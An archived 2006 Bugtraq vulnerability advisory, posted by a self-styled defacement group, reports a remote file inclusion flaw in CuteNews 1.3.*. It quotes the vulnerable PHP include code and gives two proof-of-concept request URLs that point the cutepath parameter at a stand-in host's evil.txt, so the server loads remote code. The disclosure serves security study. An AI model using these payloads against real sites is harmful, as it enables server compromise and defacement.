| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 25 Aug 2006 19:14:46 -0000
From: stormhacker@...mail.com
To: bugtraq@...urityfocus.com
Subject: CuteNews 1.3.* Remote File Include Vulnerability
Welcome people In World Defacers Team
[W]orld [D]efacers Team
======================================
--------------------Summary----------------
eVuln ID: WD22
Vendor: CuteNews 1.3.*
Vendor's Web Site: http://cutephp.com/
Software: Live Customer Support Solution :- http://www.pansionat.net/novost/
Class: Remote
PoC/Exploit: Available
Solution: Not Available
Discovered by: rUnViRuS (worlddefacers.de)
-----------------Description---------------
$cutepath = __FILE__;
$cutepath = preg_replace( "'\\\search\.php'", "", $cutepath);
$cutepath = preg_replace( "'/search\.php'", "", $cutepath);
require_once("$cutepath/inc/functions.inc.php");
--------------PoC/Exploit----------------------
show_news.php?cutepath=http://host/evil.txt?
search.php?cutepath=http://host/evil.txt?
--------------Solution---------------------
No Patch available.
--------------Credit-----------------------
Discovered by: rUnViRuS (worlddefacers.de)
Powered by blists - more mailing lists